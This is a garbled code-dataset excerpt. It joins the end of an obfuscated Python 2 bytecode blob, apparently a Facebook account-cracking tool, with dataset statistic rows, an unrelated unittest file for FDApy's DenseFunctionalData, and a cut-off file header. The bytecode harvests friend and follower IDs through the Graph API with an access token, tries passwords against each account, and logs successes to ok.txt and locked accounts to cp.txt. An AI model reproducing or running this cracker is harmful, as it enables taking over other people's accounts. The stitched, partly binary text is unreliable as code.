3\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x17\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\x18\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\x9f\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03WnN\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1d\x00t\x12\x00\x17d\x1e\x00\x17t\x13\x00\x17GHd\x04\x00GHt\x14\x00\x83\x00\x00\x01d\x1f\x00t\x15\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x17\x00j\x18\x00d \x00\x83\x01\x00\x01d!\x00GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d$\x00\x86\x00\x00}\n\x00t\x19\x00d%\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1a\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHd&\x00GHd\'\x00t\x15\x00t\x16\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17d(\x00\x17t\x15\x00t\x16\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHt\x00\x00d)\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(*\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x10\x00\x00\x00 Put Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x0e\x00\x00\x00Target user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s\x0f\x00\x00\x00 Put Id/user : R.\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x16\x00\x00\x00\n Press enter to back s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00\x1b[1;93mSILAHKAN DITUNGGU process is running in backgroundi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sh\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y?\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xc2\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n\x97\x06d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r)\x01d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n0\x06|\x03\x00d\x11\x00\x17}\t\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xcd\x01d\x07\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n\x8c\x05d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r4\x02d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n%\x05|\x03\x00d\x12\x00\x17}\n\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\n\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xd8\x02d\x07\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x81\x04d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r?\x03d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x1a\x04|\x03\x00d\x13\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xe3\x03d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01nv\x03d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rJ\x04d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01n\x0f\x03d\x14\x00}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xea\x04d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01no\x02d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rQ\x05d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01n\x08\x02d\x15\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17\x83\x01\x00j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xeb\x05d\x07\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01nn\x01d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rR\x06d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01n\x07\x01d\x16\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xf2\x06d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01ng\x00d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rY\x07d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x17\x00\x00\x00NR@\x00\x00\x00RF\x00\x00\x00s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=R.\x00\x00\x00R/\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;32m[Successful] \x1b[1;30ms\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x06\x00\x00\x00ok.txtRH\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comR0\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93m[Checkpoint] s\x06\x00\x00\x00cp.txtRJ\x00\x00\x00RK\x00\x00\x00RL\x00\x00\x00RN\x00\x00\x00RM\x00\x00\x00RO\x00\x00\x00(\x0c\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x07\x00\x00\x00apppend(\x0f\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00RU\x00\x00\x00R9\x00\x00\x00R*\x00\x00\x00R?\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\xec\x02\x00\x00s\xdc\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01\x1e\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s \x00\x00\x00\x1b[1;93mThe process has completeds\x14\x00\x00\x00\x1b[1;93mTotal Ok/Cp :Rb\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;93mPress entet to back (\x1b\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00R\x0b\x00\x00\x00Re\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00Rz\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rz\x00\x00\x00\x94\x02\x00\x00s\xc6\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x01\x12~\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(1\x00\x00\x00R\x06\x00\x00\x00t\x03\x00\x00\x00sysR"\x00\x00\x00t\x08\x00\x00\x00datetimet\x02\x00\x00\x00ret\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\t\x00\x00\x00threadingR\x1e\x00\x00\x00t\x07\x00\x00\x00getpasst\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibR\x1c\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x07\x00\x00\x00t\x04\x00\x00\x00patht\x06\x00\x00\x00isfilet\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R#\x00\x00\x00t\x07\x00\x00\x00randintt\x02\x00\x00\x00bdt\x03\x00\x00\x00simt\x04\x00\x00\x00reprR2\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR\x12\x00\x00\x00R\x13\x00\x00\x00t\x02\x00\x00\x00c3R\x08\x00\x00\x00R\x0b\x00\x00\x00R\n\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00R&\x00\x00\x00R\x0f\x00\x00\x00R=\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rd\x00\x00\x00Ro\x00\x00\x00Ru\x00\x00\x00Rv\x00\x00\x00R\x10\x00\x00\x00Rz\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sn\x00\x00\x00\x03\x01\x9c\x01\x14\x01\r\x01\r\x01\x11\x01\r\x0b\x12\x01\x10\x01\x12\x01\x10\x01\x10\x01\r\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\x12\x01P\x01\n\x01\r\x01\x06\x01\x06\x01\x06\x02\t\x02\t\n\t\x0b\t\n\t"\t"\t,\t\xea\t\x0b\t\t\t\x12\t_\t+\t\x08\t,\t\xe2\x0c\x01'))
| 16,569.75
| 66,237
| 0.748276
| 15,099
| 66,279
| 3.279091
| 0.050864
| 0.205772
| 0.090525
| 0.04605
| 0.837006
| 0.801095
| 0.752883
| 0.72293
| 0.698734
| 0.65846
| 0
| 0.400027
| 0.010577
| 66,279
| 3
| 66,238
| 22,093
| 0.354967
| 0.000362
| 0
| 0
| 0
| 6.5
| 0.589217
| 0.424623
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 16
|
039a2fb23c4b4884eeedbea61f703521ad519e98
| 4,917
|
py
|
Python
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 19
|
2019-02-11T08:35:29.000Z
|
2022-01-27T16:51:10.000Z
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 4
|
2020-04-07T07:10:26.000Z
|
2022-02-09T16:33:19.000Z
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 7
|
2020-04-24T13:24:02.000Z
|
2022-02-18T17:28:30.000Z
|
#!/usr/bin/python3.7
# -*-coding:utf8 -*
import numpy as np
import unittest
from FDApy.representation.functional_data import (DenseFunctionalData,
IrregularFunctionalData)
class TestDenseFunctionalData1D(unittest.TestCase):
"""Test class for the class DenseFunctionalData in one dimension."""
def setUp(self):
argvals = {'input_dim_0': np.array([1, 2, 3, 4])}
values = np.array([[1, 2, 3, 4],
[5, 6, 7, 9],
[3, 4, 5, 7],
[3, 4, 6, 1],
[3, 4, 7, 6]])
self.dense_fd = DenseFunctionalData(argvals, values)
def test_argvals_stand(self):
is_equal = np.allclose(self.dense_fd.argvals_stand['input_dim_0'],
np.array([0., 0.33333333, 0.66666667, 1.]))
self.assertTrue(is_equal)
def test_n_obs(self):
self.assertEqual(self.dense_fd.n_obs, 5)
def test_n_dim(self):
self.assertEqual(self.dense_fd.n_dim, 1)
def test_range_obs(self):
self.assertEqual(self.dense_fd.range_obs, (1, 9))
def test_range_dim(self):
self.assertEqual(self.dense_fd.range_dim, {'input_dim_0': (1, 4)})
def test_shape(self):
self.assertEqual(self.dense_fd.shape, {'input_dim_0': 4})
def test_subset(self):
new_dense_fd = self.dense_fd[2]
self.assertIsInstance(new_dense_fd, DenseFunctionalData)
self.assertEqual(new_dense_fd.n_obs, 1)
new_dense_fd = self.dense_fd[1:4]
self.assertIsInstance(new_dense_fd, DenseFunctionalData)
self.assertEqual(new_dense_fd.n_obs, 3)
def test_as_irregular(self):
irregu_fd = self.dense_fd.as_irregular()
self.assertIsInstance(irregu_fd, IrregularFunctionalData)
self.assertEqual(irregu_fd.n_obs, 5)
def test_is_compatible(self):
self.assertTrue(self.dense_fd.is_compatible(self.dense_fd))
def test_mean(self):
mean_fd = self.dense_fd.mean()
is_equal = np.allclose(mean_fd.values,
np.array([[3., 4., 5.6, 5.4]]))
self.assertTrue(is_equal)
class TestDenseFunctionalData2D(unittest.TestCase):
"""Test class for the class DenseFunctionalData in two dimension."""
def setUp(self):
argvals = {'input_dim_0': np.array([1, 2, 3, 4]),
'input_dim_1': np.array([5, 6, 7])}
values = np.array([[[1, 2, 3], [1, 2, 3], [1, 2, 3], [1, 2, 3]],
[[5, 6, 7], [5, 6, 7], [5, 6, 7], [5, 6, 7]],
[[3, 4, 5], [3, 4, 5], [3, 4, 5], [3, 4, 5]],
[[3, 4, 6], [3, 4, 5], [3, 4, 5], [3, 4, 5]],
[[3, 4, 7], [3, 4, 5], [3, 4, 5], [3, 4, 5]]])
self.dense_fd = DenseFunctionalData(argvals, values)
def test_argvals_stand(self):
is_equal_dim0 = np.allclose(self.dense_fd.argvals_stand['input_dim_0'],
np.array([0., 0.33333333, 0.66666667, 1.]))
is_equal_dim1 = np.allclose(self.dense_fd.argvals_stand['input_dim_1'],
np.array([0., 0.5, 1.]))
self.assertTrue(is_equal_dim0 and is_equal_dim1)
def test_n_obs(self):
self.assertEqual(self.dense_fd.n_obs, 5)
def test_n_dim(self):
self.assertEqual(self.dense_fd.n_dim, 2)
def test_range_obs(self):
self.assertEqual(self.dense_fd.range_obs, (1, 7))
def test_range_dim(self):
self.assertEqual(self.dense_fd.range_dim, {'input_dim_0': (1, 4),
'input_dim_1': (5, 7)})
def test_shape(self):
self.assertEqual(self.dense_fd.shape, {'input_dim_0': 4,
'input_dim_1': 3})
def test_subset(self):
new_dense_fd = self.dense_fd[2]
self.assertIsInstance(new_dense_fd, DenseFunctionalData)
self.assertEqual(new_dense_fd.n_obs, 1)
new_dense_fd = self.dense_fd[1:4]
self.assertIsInstance(new_dense_fd, DenseFunctionalData)
self.assertEqual(new_dense_fd.n_obs, 3)
def test_as_irregular(self):
irregu_fd = self.dense_fd.as_irregular()
self.assertIsInstance(irregu_fd, IrregularFunctionalData)
self.assertEqual(irregu_fd.n_obs, 5)
def test_is_compatible(self):
self.assertTrue(self.dense_fd.is_compatible(self.dense_fd))
def test_mean(self):
mean_fd = self.dense_fd.mean()
is_equal = np.allclose(mean_fd.values,
np.array([[[3., 4., 5.6],
[3., 4., 5.],
[3., 4., 5.],
[3., 4., 5.]]]))
self.assertTrue(is_equal)
if __name__ == '__main__':
unittest.main()
| 37.25
| 79
| 0.557657
| 654
| 4,917
| 3.943425
| 0.110092
| 0.105855
| 0.115161
| 0.017061
| 0.865839
| 0.83986
| 0.828228
| 0.828228
| 0.828228
| 0.759209
| 0
| 0.059842
| 0.306691
| 4,917
| 131
| 80
| 37.534351
| 0.696685
| 0.03315
| 0
| 0.59375
| 0
| 0
| 0.029523
| 0
| 0
| 0
| 0
| 0
| 0.291667
| 1
| 0.229167
| false
| 0
| 0.03125
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff13038786188a421bccf939abca99192e6af3d7
| 188
|
py
|
Python
|
tests/integrations/pytorch_lightning/loggers_test.py
|
allenai/tango
|
80c90caefae4ad1c3f8472718ddada912cd8fcf9
|
[
"Apache-2.0"
] | 52
|
2021-09-24T17:52:34.000Z
|
2022-03-29T22:55:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 90
|
2021-09-29T04:23:29.000Z
|
2022-03-31T21:23:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 8
|
2021-11-13T01:56:22.000Z
|
2022-02-27T03:29:42.000Z
|
from tango.integrations.pytorch_lightning.loggers import LightningLogger
def test_all_loggers_registered():
assert "pytorch_lightning::CSVLogger" in LightningLogger.list_available()
| 31.333333
| 77
| 0.845745
| 21
| 188
| 7.285714
| 0.809524
| 0.20915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 188
| 5
| 78
| 37.6
| 0.889535
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 0.148936
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
20cda4aeb3edeb780b7eecff0611e31b097458ab
| 6,592
|
py
|
Python
|
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | 5
|
2018-07-22T17:17:10.000Z
|
2021-11-13T04:11:19.000Z
|
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | null | null | null |
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | 2
|
2018-11-16T15:46:18.000Z
|
